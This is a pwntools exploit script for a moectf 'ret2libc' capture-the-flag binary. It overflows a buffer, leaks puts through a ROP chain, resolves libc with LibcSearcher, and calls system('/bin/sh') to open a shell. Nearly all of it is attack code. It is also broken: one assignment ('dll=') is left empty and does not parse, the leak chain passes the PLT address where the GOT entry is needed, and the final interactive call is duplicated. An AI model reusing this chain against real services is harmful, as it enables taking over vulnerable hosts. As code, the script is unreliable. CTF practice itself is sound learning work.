# moectf "ret2libc" solve script (pwntools). The page captured it with the
# line structure collapsed; the statements below are the captured tokens laid
# out one per line with conventional indentation.
from pwn import *
from LibcSearcher import*
from ctypes import*

# Target binary, loaded locally so that its GOT/PLT addresses can be read.
elf=ELF(r"/home/wrwrw/vscode/pwn/moectf/ret2libc/pwn")
# NOTE(review): the right-hand side of this assignment is missing in the
# source as captured; the line does not parse as written.
dll=
# Flag selecting a local process (True) vs. a remote connection (False).
debug=True
if debug==True:
    # Verbose pwntools logging for the local run.
    context(os='linux',arch='amd64',log_level='debug',terminal='bash')
    p=process(r"/home/wrwrw/vscode/pwn/moectf/ret2libc/pwn")
    # pwnlib.gdb.attach(p,'break main')
else:
    # Hard-coded host/port of the challenge service.
    p=remote("127.0.0.1" ,30671 )

if __name__=='__main__':
    # Addresses read from the binary.
    puts_got=elf.got['puts']
    puts_plt=elf.plt['puts']
    # Fixed addresses in the (non-PIE) binary; `inputs` is the address the
    # first chain returns to after the leak.
    inputs=0x04011E8
    pop_rdi_retn=0x000000000040117e#ROPgadget --binary babyof --only 'pop|ret' |grep rdi
    # Stage 1: 0x58 bytes of padding, then the leak chain.
    p.sendlineafter('But..maybe libc can help u??\n',b'a'*0x58+p64(pop_rdi_retn)+p64(puts_plt)+p64(puts_plt)+p64(inputs))
    p.recvline()
    # The leaked value is padded to 8 bytes before being unpacked.
    a=p.recvline(keepends=False)
    puts=u64(a.ljust(8,b'\00'))
    # Identify the remote libc from the leaked puts address, then derive the
    # base and the two symbols used in stage 2.
    libc=LibcSearcher('puts',puts)
    base=puts-libc.dump('puts')# here we subtract from the leaked GOT address
    system=base+libc.dump('system')
    sh=base+libc.dump('str_bin_sh')
    # Extra `ret` for stack alignment before the call.
    ret=0x000000000040101a #ROPgadget --binary pwn --only 'ret'
    # Stage 2: same padding, then the libc chain.
    p.sendafter('But..maybe libc can help u??\n',b'a'*0x58+p64(ret)+p64(pop_rdi_retn)+p64(sh)+p64(system)+b'\n')
    p.interactive()
# NOTE(review): duplicate of the call at the end of the `__main__` block;
# it is only reached after the first interactive session ends.
p.interactive()